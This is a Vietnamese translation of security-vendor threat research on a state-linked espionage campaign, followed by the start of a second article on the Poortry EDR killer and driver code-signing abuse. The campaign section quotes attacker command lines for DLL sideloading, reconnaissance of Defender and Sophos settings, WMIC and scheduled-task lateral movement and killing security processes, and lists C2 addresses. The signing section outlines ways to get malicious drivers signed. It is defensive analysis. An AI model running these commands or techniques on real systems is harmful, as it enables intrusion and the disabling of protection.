Trong trường hợp này, sau đó, tác nhân đã thay thế DLL Volume Shadow Copy Service hợp lệ (C:\System32\swprv.dll) bằng payload độc hại của riêng chúng, làm lu mờ thêm quá trình triển khai của chúng. Chúng đã làm điều này bằng cách sử dụng một tài khoản quản trị bị xâm phạm để sửa đổi các quyền trên DLL hiện có từ File Explorer, trước khi di chuyển bản sao (độc hại) của riêng chúng vào thư mục \System32.    

Sophos MDR đã  quan sát thấy hoạt động tương tự vào tháng 12 năm 2022 trong một vụ xâm phạm trước đó của cơ quan này được phát hiện khi bảo vệ điểm cuối Sophos ban đầu được triển khai trên mạng của cơ quan này. Các hiện vật của hoạt động đó cho thấy kẻ tấn công đã tận dụng khâu DLL để tạo ra hai DLL lớn (swprvs.dll và appmgmt.dll).   

Khi thực hiện Dịch vụ sao chép bóng từ svchost.exe, swprv.dll độc hại được phát hiện thực hiện nhiều yêu cầu DNS và kết nối mạng tới các miền và địa chỉ IP sau: 

• 103.19.16.248:443 // dmsz.org (nằm ở Philippines) 
• 103.56.5.224:443 // cancelle.net (có vị trí địa lý tại Philippines) 
• 49.157.28.114:443 // gandeste.net (nằm ở Philippines) 

Vào tháng 12, các tác nhân đã sử dụng kỹ thuật sideloading này để chạy phần mềm độc hại giao tiếp với địa chỉ IP 123.253.35.100 (được định vị địa lý tại Malaysia), thông qua quy trình trình duyệt Internet Explorer iexplore.exe. Theo phân tích từ SophosLabs, DLL được thiết kế để thay đổi cài đặt proxy tường lửa và được quan sát thấy đang tạo một shell lệnh để hoàn tất quá trình khám phá. DLL chứa một chuỗi đáng ngờ dường như tiết lộ đường dẫn tệp trên máy tính phát triển của người tạo phần mềm độc hại (E:\Masol_https190228\x64\Release\Masol.pdb). 

Trong một ví dụ về các cuộc tấn công tương tự nhưng khác biệt, trong khi cả Cluster Charlie và Cluster Alpha đều chọn triển khai một số phần tải trọng của chúng bằng cách sử dụng tải phụ Service DLL, dịch vụ mà Cluster Charlie nhắm tới, thì Volume Shadow Copy Service đã sử dụng các quyền gốc mà Cluster Alpha đã thêm vào dịch vụ IKEEXT (IKE và AuthIP IPsec Keying Modules) vào tháng 6 năm 2023, như đã mô tả trong Phần 1 Phân tích chuyên sâu về kỹ thuật của chúng tôi . 

Tháng 11 và tháng 12 năm 2023, phần 2: Hành động né tránh, trốn tránh EDR và ​​trinh sát sâu hơn 

Vào giữa tháng 11, cùng một máy chủ ứng dụng web đã bị tấn công vào tháng 9 đã bị xâm phạm một lần nữa, với tác nhân đe dọa sử dụng thông tin đăng nhập bị đánh cắp từ một thiết bị không được quản lý và một web shell bị xóa. Những kẻ tấn công đã sử dụng shell để thực thi rundll32.exe, đưa một Havoc DLL độc hại (với phần mở rộng tệp được đổi thành .pdf) vào backgroundtaskhost.exe, một thành phần Windows chịu trách nhiệm thực thi trợ lý ảo Windows (Cortana): 

rundll32 C:\inetpub\wwwroot\idocs_api\Temp\<REDACTED>DOC20231100001603KMAP.pdf,Start 

DLL này đã gửi thông tin liên lạc C2 đến máy chủ C2 của kẻ tấn công (107.148.41.114, có vị trí địa lý tại Hoa Kỳ). 

Tiếp theo, kẻ tấn công chạy lệnh sau để kiểm tra xem đăng nhập RDP có thành công không. Kẻ tấn công đang tìm kiếm Windows Event Logs cho Windows Remote Connection Manager event ID 1149: 

/c wevtutil qe Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational /rd:true /f:text /q:*[System[(EventID=1149)]] >> c:\windows\temp\1.txt 

Truy vấn này sẽ trả về các sự kiện Windows báo hiệu việc thiết lập thành công phiên kết nối từ xa của Terminal Services. Sau đó, Havoc DLL đã gửi lệnh ping trở lại C2 của nó. 

Tiếp theo, quy trình được tiêm sử dụng WMIC để truy vấn đường dẫn loại trừ của Windows Defender, điều này sẽ cung cấp cho chúng thông tin về những thư mục và loại tệp nào không được Defender quét—về mặt lý thuyết, những vị trí có thể được sử dụng để tránh bảo vệ khỏi phần mềm độc hại. 

/c WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference get ExclusionPath

Nó cũng truy vấn sổ đăng ký Sophos để hiểu rõ hơn các giá trị của Sổ đăng ký “PolicyConfiguration”, “threat policy” và “Poll Server”, cũng như sử dụng cmd.exe để truy vấn trạng thái “SophosHealthClient.exe”. Điều này tiết lộ cấu hình chính sách bảo mật cho điểm cuối, trạng thái bảo vệ Sophos trên thiết bị và URL mà phần mềm bảo vệ điểm cuối thăm dò để thay đổi cài đặt cấu hình. Khi kết thúc truy vấn, tác nhân đe dọa đã sử dụng lệnh sau để xác định các loại trừ, mục được phép và mục bị chặn trong cấu hình: 

findstr /i /c:exclude /c:whitelist /c:blocklist 

Dữ liệu máy chủ thăm dò có thể được phần mềm độc hại như EagerBee (như đã thấy trong hoạt động Cluster Alpha được ghi lại trong báo cáo gần đây nhất của chúng tôi ) sử dụng để chặn dữ liệu đo từ xa và cập nhật cho điểm cuối trong tương lai, mặc dù không có bằng chứng nào cho thấy điều đó xảy ra ở đây. 

Cũng trong tháng 11, bằng cách sử dụng một tài khoản quản trị bị xâm phạm, những kẻ tấn công đã sử dụng phiên shell lệnh được tạo ra từ DLL độc hại để di chuyển ngang qua WMIC và triển khai công cụ SharpHound nguồn mở dưới dạng DLL để lập bản đồ cơ sở hạ tầng Active Directory.  

/c wmic /node:172.xx.xxx.xxx/password:”<REDACTED>” /user:”<REDACTED>” process call create “cmd /c C:\Windows\syswow64\rundll32.exe C:\windows\syswow64\Windows.Data.Devices.Config.dll,Start”

Sau đó, kẻ tấn công sử dụng thông tin xác thực để truy cập vào một trong các chương trình quản lý siêu giám sát của tổ chức và tạo một tác vụ theo lịch trình, thực thi một DLL độc hại khác ngụy trang thành tệp .ini để kết nối với cùng một IP C2 bên ngoài như IP ngụy trang thành tệp PDF. 

schtasks /create /tn \Microsoft\Windows\Clip2 /tr “rundll32 C:\programdata\vmnat\Test\log.ini,Start” /ru System /sc minute /mo 90 /f 

Tác vụ theo lịch trình này cho phép kẻ tấn công thực hiện một bước chuyển khác từ trình quản lý ảo sang hệ thống khác để thực thi SharpHound, bằng cách sử dụng tài khoản quản trị trước đó được liên kết với Cluster Charlie.  

/c schtasks /create /s 172.xx.xxx.xxx /p “<REDACTED>” /u “<REDACTED>” /tn \Microsoft\Windows\Clip2 /tr “C:\Windows\syswow64\rundll32.exe C:\windows\syswow64\Windows.Data.Devices.Config.dll,Start” /ru System /sc minute /mo 90 /f 

Tháng 12 năm 2023: Thu thập và lọc 

Vào tháng 12, những kẻ tấn công đã tiến hành một loạt các nỗ lực do thám và thu thập. Điều này bao gồm việc thu thập thông tin đăng nhập và dữ liệu của quản trị viên cho những người dùng cụ thể, cũng như ping các tài khoản người dùng và máy mà chúng tôi quan sát thấy những kẻ tấn công do thám trong  hoạt động Cluster Charlie trước đó vào tháng 6 năm 2023. Trong thời gian này, những kẻ tấn công đã tiến hành hoạt động gián điệp có mục tiêu, trong đó chúng thu thập các tài liệu nhạy cảm, khóa cho cơ sở hạ tầng đám mây (bao gồm phục hồi sau thảm họa và sao lưu), các khóa và chứng chỉ xác thực quan trọng khác và dữ liệu cấu hình cho phần lớn cơ sở hạ tầng CNTT và mạng của cơ quan.  

2024: Tăng tốc 

 Vào năm 2024, rõ ràng là các tác nhân đe dọa đã bắt đầu nhanh chóng luân chuyển qua các kênh C2 để duy trì và quản lý quyền truy cập liên tục khi Sophos phát hiện và chặn các cấy ghép C2 hiện có. Chúng cũng thay đổi cách triển khai các tải trọng độc hại. Từ tháng 11 năm 2023 đến ít nhất là tháng 5 năm 2024, các tác nhân trong Cluster Charlie đã triển khai các cấy ghép C2 bằng 28 tổ hợp duy nhất của chuỗi tải phụ, phương pháp thực thi và trình tải shellcode.  

Có ba lý do khiến các diễn viên nhanh chóng luân chuyển kênh C2 và phương pháp triển khai của họ: 

• Có bằng chứng cho thấy những kẻ tấn công đang thử nghiệm để xem liệu Sophos có phát hiện ra các tệp và phương pháp triển khai khác nhau hay không.  
• Các kênh C2 xoay vòng nhanh chóng và phương pháp triển khai có thể khiến bên phòng thủ khó theo kịp và ngăn chặn hơn.  
• Những kẻ tấn công đã phản hồi lại hành động chặn của chúng tôi, đôi khi thiết lập lại quyền truy cập trong vòng 24 giờ và triển khai một mẫu duy nhất đã được sửa đổi trong vòng chưa đầy bốn ngày để tránh bị phát hiện chặn. 

Vào tháng 1, chúng tôi đã thấy thêm nhiều vụ thu thập có chủ đích các tài liệu của người dùng và cơ sở dữ liệu truyền thông Viber for Desktop, thu thập các cuộc trò chuyện nội bộ tại tổ chức. Những kẻ tấn công cũng đã thực hiện các biện pháp để vô hiệu hóa phần mềm bảo vệ điểm cuối hoặc trốn tránh phát hiện khi không thể vô hiệu hóa phần mềm. 

Tháng 1 năm 2024: RealBlindingEDR 

Vào tháng 1 năm 2024, Sophos MDR đã quan sát thấy các tác nhân triển khai hai mẫu RealBlindingEDR đã được sửa đổi đôi chút , một công cụ nguồn mở được thiết kế để “làm mù” (hoặc giết chết) các giải pháp bảo vệ phần mềm độc hại và phát hiện và phản hồi điểm cuối (EDR). Trớ trêu thay, các tác nhân đã sử dụng một sản phẩm bảo vệ phần mềm độc hại để thực thi trình diệt EDR nhằm tạo ra một chuỗi thực thi có vẻ “an toàn” đối với các công cụ bảo vệ phần mềm độc hại khác, tương tự như cách phần mềm độc hại “trình diệt EDR” trước đây đã sử dụng các thành phần Windows đáng tin cậy .  

Để minh họa cách chuỗi tấn công trở nên phức tạp hơn, sau đây là cách kẻ tấn công phát hành tệp nhị phân RealBlindingEDR asoc.exe:. 

Đầu tiên, kẻ tấn công chạy một tệp lệnh hàng loạt (33.bat) thực thi lệnh sau:  

cd c:\ProgramData && c:\ProgramData\kaba.exe chạy run-cmd “c:\ProgramData\asoc.exe -cccc” 

Lệnh này sử dụng kaba.exe, phiên bản đổi tên của tệp thực thi Kaspersky hợp lệ, để tải mẫu RealBlindingEDR, asoc.exe. 

Sau khi thực thi, đầu tiên asoc.exe sẽ cố gắng kiểm tra xem trình điều khiển echo đã được tải chưa. Nếu chưa, nó sẽ cố gắng tải trình điều khiển ProgramData\mico.sys (phiên bản đổi tên của echo_driver.sys được triển khai như một phần của bộ công cụ RealBlindingEDR) và lấy xử lý của nó. Các tệp nhị phân khai thác lỗ hổng trong công cụ chống gian lận cho Minecraft có tên là Echo.ac (CVE-2023-38817) và sử dụng công cụ đó để xóa các thói quen hạt nhân được sử dụng bởi một số sản phẩm EDR khác nhau, cho phép các tác nhân leo thang đặc quyền của chúng thông qua hành vi trộm cắp mã thông báo. Echo.ac đã được triển khai trong trường hợp này và các trường hợp khác dưới dạng mico.sys. Sau đó, cuộc tấn công sử dụng cùng một kỹ thuật để xóa các lệnh gọi lại hạt nhân CmRegisterCallbacks và MiniFilterCallbacks, cả hai đều là các hàm hạt nhân mà nhiều sản phẩm EDR sử dụng để giám sát hoạt động của hệ thống.  

Sau khi RealBlindingEDR xóa các chương trình kernel này khỏi bộ nhớ, nó sẽ dỡ tải trình điều khiển Echo.ac (mico.sys) và chạy

taskkill /IM SophosFileScanner.exe /F

để giết tiến trình SophosFileScanner.exe. Để báo hiệu thao tác thành công, các tệp nhị phân sẽ tạo một tệp trống trong C:\Users\Public\log.ini. Sự hiện diện của tệp này cho biết thành công. 

Một mẫu RealBlindingEDR khác được phát hiện, ssoc.exe, có một khả năng bổ sung: Nó sử dụng một kỹ thuật đã biết để cố gắng làm sập các quy trình EDR, bằng cách tạo một khóa Registry có tên là SophosFileScanner.exe trong đường dẫn SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, và tạo một giá trị chuỗi có tên là MinimumStackCommitInBytes bên trong khóa đó. 

Sophos cũng quan sát thấy nỗ lực của các tác nhân nhằm sử dụng một công cụ mã nguồn mở có tên là Alcatraz , đây là một trình mã hóa nhị phân x64. Từ tháng 2 đến tháng 5, công cụ này đã bị phát hiện (dưới dạng ATK/Alcatraz-D) tại vị trí C:\ProgramData\conhost.exe và bị Sophos ngăn không cho chạy trong bốn lần riêng biệt. 

Tháng 2 năm 2024: Kiểm tra chiến thuật và công cụ 

Sau khi Sophos mở rộng phạm vi phát hiện của khung Havoc C2, tác nhân đe dọa bắt đầu nhanh chóng tuần hoàn qua một số tùy chọn cấy ghép C2. Chúng triển khai khung XieBroC2 làm bản sao lưu. Đồng thời, các tác nhân dường như đang chế tạo lại cơ chế triển khai của chúng. 

Một trong những cơ chế mà họ chuyển sang là Donut , một công cụ mã nguồn mở tạo ra các tập lệnh tiêm shellcode được thiết kế để tránh các công cụ bảo mật. Donut có thể tải một payload độc hại từ bộ nhớ và tiêm nó vào các quy trình Windows tùy ý. Các tác nhân đe dọa đã được quan sát thấy nhiều lần sử dụng trình tải dựa trên Donut để thả các cấy ghép C2, thường xuyên thả các biến thể của các cấy ghép trong vòng vài giờ trên các máy chủ khác nhau. 

Vào ngày 1 tháng 2, các diễn viên dường như đã tiến hành một hình thức thử nghiệm A/B phần mềm độc hại, triển khai hai DLL độc hại khác nhau có cùng tên (msntlm.dll) trong vòng hai giờ sau mỗi lần. Cả hai DLL đều liên hệ với cùng một địa chỉ C2 ( 141.136.44.219, có vị trí địa lý tại Síp) tại tên miền gsenergyspeedtest.com, trùng khớp với mẫu đặt tên miền được nhóm phụ Earth Longzhi và Cluster Charlie của APT 41 sử dụng trong hoạt động trước đó. 

Cả hai DLL phần mềm độc hại đều là trình tải shellcode Donut. Một trong các mẫu đã giải mã và đưa Havoc Shellcode Dropper vào svchost.exe, sau đó đưa một payload Havoc nhúng vào bộ nhớ và thực thi payload đó. Mẫu còn lại đã giải mã một Havoc Shellcode Injector đưa một Cobalt Strike Reflective Loader vào svchost.exe.  

Vào một dịp khác, 27 ngày sau lần thử nghiệm A/B ban đầu, chúng tôi đã quan sát thấy các tác nhân tải hai phiên bản của một tệp độc hại (libcef.dll) bằng cách lạm dụng Java Chromium Embedded Framework Helper hợp pháp (jcef_helper.exe). Một mẫu libcef.dll đã triển khai XiebroC2 thông qua shellcode từ Donut (kết nối đến 64.176.50.42:8444, được định vị địa lý tại Hoa Kỳ) , trong khi mẫu còn lại triển khai một tải trọng Havoc được mã hóa được nhúng trong đó, khi giải mã sẽ tiếp cận đến IP của kẻ tấn công là 141.136.44.219 — cùng một địa chỉ C2 tại Síp được sử dụng trong sự cố ngày 1 tháng 2.  

Tổng cộng, trong tháng 2 và tháng 3 năm 2024, chúng tôi đã chứng kiến ​​bảy lần triển khai libcef.dll sử dụng jcef_helper.exe, trong một số trường hợp được đổi tên thành C:\PerfLogs\conhost.exe và trong những trường hợp khác không đổi tên.  

Tháng 2 và tháng 3 năm 2024: Mang theo người trợ giúp 

Nhiều lần, những kẻ tấn công đã mang theo một tệp thực thi dễ bị tấn công để tải các tệp DLL độc hại. Vào tháng 2, chúng đã mang theo tệp độc hại c:\perflogs\wsoc.exe và di chuyển tệp này trong môi trường mục tiêu để tạo các quy trình tiêm mã độc. SophosLabs xác định wsoc.exe hoạt động bằng cách tạo một phiên bản của Microsoft WMI Provider Subsystem Host để chạy WmiPrvse để sau đó có thể tiêm mã độc vào đó. Trong trường hợp này, chúng đã tiêm libcef.dll vào WMIPrvSe.exe như một lớp che giấu khác. Các lệnh này dường như là một hình thức thử nghiệm của kẻ tấn công. 

Vào tháng 3, những kẻ tấn công đã thực hiện thêm các điều chỉnh đối với các bản cấy ghép. Vào đầu tháng 3, tác nhân đã tận dụng jconsole.exe để tải tệp DLL độc hại jli.dll (tên thực tế: ExecIT.dll , trình tải mã shell ExecIT). Sau khi tác nhân tải tệp ExecIT, tệp sẽ kiểm tra sự hiện diện của tệp log.ini trong cùng thư mục trước khi đọc tệp log.ini và đưa tệp này vào bộ nhớ của nó. Theo phân tích của Sophos X-Ops, jli.dll cũng kiểm tra các trình gỡ lỗi khác nhau (scylla_x64.exe, ollydbg.exe, idaq64.exe, Zeta Debugger hoặc IMMUNITYDEBUGGER.EXE) và các công cụ giám sát và phân tích khác nhau (Unpacked.exe, reshacker.exe và các công cụ khác). 

 Những kẻ tấn công đã thả DLL được tải bên ngoài thông qua chuyển động ngang từ một thiết bị bị xâm phạm khác và phát hiện ra rằng cấy ghép tạo ra các kết nối mạng ra ngoài đến 198.13.47.158:443 (được định vị địa lý tại Nhật Bản). Địa chỉ IP này đã được các tác nhân đe dọa Cluster Charlie sử dụng trước đó vào tháng 3 năm 2023 làm C2 cho mẫu cửa hậu PocoProxy.  

Tác nhân đe dọa di chuyển theo chiều ngang bằng cách sao chép các tệp jconsole.exe, jli.dll và log.ini, sau đó tạo một tác vụ theo lịch trình từ xa để thực thi tải trọng trên các máy mục tiêu. Jconsole.exe được quan sát thấy tạo ra 131 lệnh khám phá, di chuyển theo chiều ngang và xóa chỉ báo khác nhau. Ngay sau đó, tiến trình jconsole.exe độc ​​hại được thực thi từ tác vụ theo lịch trình từ xa và tạo kết nối IP trực tiếp đến 198.13.47.158:443.   

Những kẻ tấn công đã chuyển sang trình tải shellcode Donut một lần nữa vào ngày 11 tháng 3, một lần nữa lạm dụng jcef_helper.exe để tải một bản sao Havoc C2 (libcef.dll) cùng với tệp log.bin. Tệp log.bin đóng vai trò là trình kích hoạt cho bản sao; shellcode chỉ đưa bản sao vào và tạo kết nối đến C2 của tác nhân (IP 45.77.46.245:443, định vị địa lý tại Singapore) khi log.bin có mặt.  

Tháng 4 năm 2024: Triển khai tin đồn 

Vào ngày 8 và 12 tháng 4, các tác nhân đã thực hiện ba lần tải phụ khác nhau bằng cách lạm dụng thành phần identity_helper.exe hợp lệ của trình duyệt Edge để tải phụ các DLL độc hại có tên là msedge_elf.dll. DLL này là trình tải Donut mang tải trọng Havoc C2 dưới dạng tệp nhị phân, tệp này sẽ được đưa vào bộ nhớ khi giải mã. Trong hai trường hợp, tải trọng Havoc đi kèm đã được mã hóa đã được gửi vào C:\Windows\temp\temp.log và được kết nối với máy chủ C2 tại 64.176.37.107:443 (được định vị địa lý tại Canada); trong một trường hợp khác, nó đã được thả vào cùng một vị trí với DLL có tên log.ini và được kết nối đến 45.77.46.245:443 (được định vị địa lý tại Hoa Kỳ).   

Vào ngày 10 tháng 4, các tác nhân đã sử dụng một jconsole.exe được đổi tên khác, lần này đổi tên thành firefox.exe, trong một nỗ lực tương tự như cuộc tấn công ExecIT tháng 3. Trình tải shellcode trong trường hợp này không được phục hồi, nhưng cấy ghép Havoc đã được đưa vào firefox.exe và kết nối đến 64.176.37.107:443, giống như hai trong số những lần được đưa vào bởi trình tải Donut đã làm. Vào ngày 12 tháng 4, một nỗ lực thứ tư để tận dụng identity_helper.exe—lần này được đổi tên thành fireconf.exe—đã bị bảo vệ điểm cuối của Sophos chặn ngay lập tức. 

Cùng thời điểm đó, các tác nhân đã triển khai một biến thể trình tải shellcode của msedge_elf.dll dưới dạng một tệp thực thi độc lập (pp.exe).  

cmd /c “sao chép c:\users\public\temp.log \\172.xxx.xxx.xxx\c$\windows\temp && sao chép c:\users\public\pp.exe\\172.xxx.xxx.xxx \c$\perflogs\conhost.exe” 

Cũng vào đầu tháng 4, chúng tôi đã quan sát thấy hai công cụ keylogger khác nhau được triển khai đến cùng một máy chủ cùng một lúc, một trong số đó là phần mềm độc hại chưa được báo cáo trước đó mà chúng tôi đặt tên là TattleTale — một keylogger có các khả năng bổ sung. Chúng tôi đã quan sát thấy việc sử dụng công cụ này sớm nhất là vào tháng 8 năm 2023 nhưng trước đó không thể chụp được mẫu. Các keylogger đã được triển khai đến các tài khoản người dùng quản trị mục tiêu cụ thể và các tài khoản khác đáng quan tâm. 

TattleTale được triển khai dưới dạng tệp r2.exe và được tạo trên đĩa bởi identity_helper.exe. Theo phân tích của Sophos X-Ops, phần mềm độc hại có thể lấy dấu vân tay hệ thống bị xâm phạm và kiểm tra các ổ đĩa vật lý và mạng được gắn kết bằng cách mạo danh người dùng đã đăng nhập. TattleTale cũng thu thập tên bộ điều khiển miền và đánh cắp Chính sách thông tin truy vấn LSA (Cơ quan bảo mật cục bộ), được biết là chứa thông tin nhạy cảm liên quan đến chính sách mật khẩu, cài đặt bảo mật và đôi khi là mật khẩu được lưu trong bộ nhớ đệm. Khả năng ghi phím của TattleTale bao gồm thu thập dữ liệu lưu trữ và trình duyệt Edge và Chrome, lưu dữ liệu đã thu thập này vào tệp .pvk được đặt theo tên của tổ chức nạn nhân. Đầu ra của phần mềm ghi phím được mã hóa cứng vào mẫu, do đó thư mục đầu ra của nó có khả năng thay đổi tùy theo từng mẫu. 

Các tác nhân đã triển khai keylogger r1.exe cùng với hai trình điều khiển, C:\users\public\rsndispot.sys và C:\users\public\kl.sys, để tạm thời vô hiệu hóa dữ liệu từ xa EDR. r1.exe được thực thi bởi một tệp có tên 2.bat và thiết lập liên lạc đến một địa chỉ vòng lặp. Sau đó, r1.exe truy cập vào các tệp cơ sở dữ liệu được bảo vệ của Chrome. 

Trên cùng một hệ thống quản trị mục tiêu, các tác nhân cũng triển khai một keylogger khác (‘c:\users\public\dd.dat’), đầu ra của keylogger này sẽ được lưu dưới dạng tệp .dat (‘C:\Users\Public\log.dat’). 

Tháng 6 năm 2024: Cloudflared 

Vào ngày 13 tháng 6, trong một động thái khác gợi nhớ nhiều hơn đến các cuộc xâm nhập của tội phạm mạng, các tác nhân đã sử dụng Impacket để cài đặt máy khách đường hầm Cloudflared trên một thiết bị duy nhất. Trước khi cài đặt, chúng đã có thể vô hiệu hóa dữ liệu từ xa điểm cuối từ thiết bị mục tiêu, do đó việc triển khai đường hầm không được báo cáo cho đến khi phản hồi sự cố kích hoạt lại bảo vệ điểm cuối vào cuối tháng đó. 

Kết luận 

Các cuộc xâm nhập và hoạt động được ghi lại trong báo cáo này vẫn tiếp diễn. Chúng tôi tiếp tục thấy các dấu hiệu của các nhóm hoạt động đe dọa mà chúng tôi đã xác định trong báo cáo ban đầu khi chúng cố gắng xâm nhập vào các mạng khác của khách hàng Sophos trong cùng khu vực. 

Trong suốt quá trình giao tranh, kẻ thù dường như liên tục thử nghiệm và tinh chỉnh các kỹ thuật, công cụ và hoạt động của chúng. Khi chúng tôi triển khai các biện pháp đối phó với phần mềm độc hại tùy chỉnh của chúng, chúng kết hợp việc sử dụng các công cụ do chúng phát triển tùy chỉnh với các công cụ chung, mã nguồn mở thường được các nhà kiểm tra xâm nhập hợp pháp sử dụng, thử nghiệm các kết hợp khác nhau.  

Chiến dịch gián điệp mạng này đã được phát hiện thông qua dịch vụ săn tìm mối đe dọa do con người điều hành của Sophos MDR, đóng vai trò quan trọng trong việc chủ động xác định hoạt động đe dọa. Ngoài việc tăng cường hoạt động của MDR, dịch vụ săn tìm mối đe dọa MDR còn đưa vào đường ống phân tích phần mềm độc hại X-Ops của chúng tôi để cung cấp khả năng bảo vệ và phát hiện được cải tiến. 

Cuộc điều tra về chiến dịch này chứng minh tầm quan trọng của một chu trình tình báo hiệu quả, phác thảo cách thức một cuộc săn lùng mối đe dọa xuất phát từ một phát hiện gia tăng có thể tạo ra thông tin tình báo để phát triển các phát hiện mới và khởi động các cuộc săn lùng bổ sung. 

Các chỉ số về sự xâm phạm cho hoạt động Crimson Palace bổ sung này có sẵn trên trang GitHub của Sophos tại đây . Để có cái nhìn sâu sắc về cuộc săn lùng mối đe dọa đằng sau chiến dịch gián điệp mạng kéo dài gần hai năm này, hãy đăng ký tham gia hội thảo trực tuyến, “ Intrigue of the Hunt: Operation Crimson Palace: Vạch trần một chiến dịch do nhà nước tài trợ nhiều đầu ”.  

Một mã độc EDR mà Sophos X-Ops theo dõi trong ba năm vẫn tiếp tục tấn công các tổ chức bị các băng đảng ransomware nhắm tới.

Được viết bởi Andreas Klopsch

Ngày 27 tháng 8 năm 2024

Vào năm 2022 và 2023, Sophos X-Ops đã công bố nghiên cứu về một bộ công cụ phá hoại chức năng của phần mềm bảo vệ điểm cuối đang được phát triển và sử dụng kết hợp với một số băng nhóm ransomware lớn. Mandiant trước đây đã đặt tên cho công cụ này là Poortry và ứng dụng tải của nó là Stonestop.

Những người tạo ra công cụ Poortry đã xoay xở để có được các trình điều khiển cấp hạt nhân tùy chỉnh, được xây dựng có mục đích thông qua quy trình ký xác nhận của Microsoft. Sau khi chúng tôi công bố nghiên cứu của mình — và Microsoft đã đóng lỗ hổng cho phép các trình điều khiển này được ký — những người tạo ra công cụ không chỉ dừng lại. Họ đã tiếp tục thêm các tính năng và chức năng vào trình điều khiển Poortry, trong một nỗ lực liên tục nhằm tránh bị phát hiện và tìm ra những cách mới để vô hiệu hóa phần mềm bảo vệ điểm cuối và EDR.

Để giải thích về các tính năng mới trong Poortry, chúng ta hãy cùng xem xét cách trình điều khiển tương tác với hệ điều hành và cách các nhà phát triển của công cụ diệt EDR này đã phát triển công cụ của họ theo thời gian.

Trình điều khiển Windows có thể phá hoại khả năng bảo vệ như thế nào

Hầu hết các phần mềm diệt EDR đều dựa vào trình điều khiển thiết bị được tải vào nhân hệ điều hành, cho phép chúng truy cập vào các loại chức năng cấp thấp để có thể hủy kết nối và chấm dứt nhiều loại phần mềm bảo vệ khác nhau.

Trong Windows, hỗ trợ nhiều thiết bị ngoại vi và thành phần được kết nối, trình điều khiển chế độ hạt nhân được cấp quyền rộng rãi cho các loại chức năng cấp thấp này. Trong những trường hợp bình thường, các trình điều khiển này không tương tác với phần mềm hoặc phần cứng từ các công ty hoặc nhà sản xuất khác, nhưng không có sự thực thi nào đối với hành vi này. Do đó, nếu trình điều khiển hợp lệ đã ký không xác thực đúng các quy trình tương tác với nó, những kẻ giết EDR có thể khai thác một số tính năng của nó để loại bỏ các biện pháp bảo vệ.

Microsoft đã phát triển nhiều cách khác nhau để hệ điều hành của họ có thể kiểm soát việc trình điều khiển có được tải hay không, chẳng hạn như cơ chế Thực thi chữ ký trình điều khiển: Trình điều khiển phải được nhà xuất bản phần mềm mà Microsoft tin cậy ký kỹ thuật số trước khi có thể tải.

Các nhà phát triển phần mềm diệt virus EDR khai thác lỗ hổng trong mô hình tin cậy này: Họ có thể sử dụng trình điều khiển dễ bị lạm dụng đã từng được một công ty phần mềm hợp pháp phát hành; Họ cũng có thể ký trình điều khiển của riêng họ bằng chứng chỉ ký mã hợp pháp (và có nhiều cách để lấy được chứng chỉ bị đánh cắp hoặc bị rò rỉ).

Nhìn chung, có ba cách mà các nhà phát triển phần mềm EDR lạm dụng chữ ký mã:

Lạm dụng chứng chỉ bị rò rỉ

Đây là cách đơn giản nhất để xử lý vấn đề: Tìm chứng chỉ ký mã bị rò rỉ, bị đánh cắp hoặc bị xâm phạm từ một công ty hợp pháp và sử dụng chứng chỉ đó để ký trình điều khiển của bạn (hoặc lừa Cơ quan cấp chứng chỉ gốc cấp chứng chỉ cho bạn).

Đối với tất cả các phiên bản Windows ra mắt sau Windows 10 phiên bản 1607, Microsoft đã yêu cầu tất cả các nhà phát triển bên thứ ba của trình điều khiển chế độ hạt nhân phải gửi trình điều khiển của họ đến cổng thông tin dành cho nhà phát triển của Microsoft để được Microsoft ký chéo. Tuy nhiên, các trình điều khiển đã ký chéo không được Microsoft ký vẫn được phép tải nếu đáp ứng một trong những điều sau:

• Máy tính đã được nâng cấp từ phiên bản Windows trước đó lên Windows 10, phiên bản 1607
• Khởi động an toàn đã bị tắt trong BIOS hệ thống
• Trình điều khiển đã được ký bằng chứng chỉ thực thể cuối được cấp trước ngày 29 tháng 7 ^năm 2015 liên kết với CA được ký chéo được hỗ trợ

Mặc dù bản cập nhật đã giảm thiểu nguy cơ từ các trình điều khiển được ký chéo bằng chứng chỉ bị đánh cắp, nhưng lỗ hổng thứ ba lại tạo ra cho phép kẻ tấn công sử dụng phương pháp thứ hai.

Làm giả dấu thời gian chữ ký

Để duy trì khả năng tương thích với các trình điều khiển cũ hơn, Windows tải các trình điều khiển được ký bằng “chứng chỉ thực thể cuối được cấp trước ngày 29 tháng 7 năm 2015 liên kết với CA được ký chéo được hỗ trợ”.

Khi ký trình điều khiển hạt nhân, Microsoft cung cấp cho nhà xuất bản phần mềm một công cụ có tên là signtool.exe . Ngoài việc ký tệp được cung cấp, signtool cũng kiểm tra để đảm bảo rằng chứng chỉ được cung cấp vẫn còn hiệu lực. Một cách để đảm bảo điều này là sử dụng hàm

Thông qua một loạt các hook vào các lệnh gọi API cấp thấp này bên trong hệ điều hành, kẻ tấn công có thể thay đổi quy trình ký và bỏ qua các kiểm tra này để ký trình điều khiển hạt nhân của riêng chúng. Một trong những hàm được hook trong kỹ thuật này là GetLocalTime để trả về dấu thời gian giả mạo để vượt qua các kiểm tra trong signtool.exe.

Bỏ qua việc xác nhận chữ ký của Microsoft

Phương pháp cuối cùng là thông qua quy trình ký xác nhận của Microsoft và lấy trình điều khiển hạt nhân được Microsoft ký trực tiếp. Đây có lẽ là phương pháp khó thực hiện nhất, nhưng cũng cung cấp chữ ký chứng chỉ WHQL mạnh do chính Microsoft cấp – gần như là chén thánh của chữ ký số.

Để lạm dụng phương pháp này, kẻ tấn công cần:

• Giấy chứng nhận EV hợp lệ
• Truy cập vào cổng thông tin dành cho nhà phát triển của Microsoft

Nếu đáp ứng được các yêu cầu này, họ có thể chuẩn bị một tệp CAB, trong đó có thông tin về tài xế, ký bằng chứng nhận EV và gửi lên bảng điều khiển.

Sau khi gửi, trình điều khiển trải qua một số lần kiểm tra để đảm bảo trình điều khiển không độc hại. Nếu trình điều khiển vượt qua các bài kiểm tra này, nó sẽ mang chữ ký “Microsoft Windows Hardware Compatibility Publisher”.

Một trong những trình điều khiển đã ký WHQL từ các cuộc tấn công năm 2022-2023

Poortry & Stonestop: Mối đe dọa đáng kể từ năm 2022

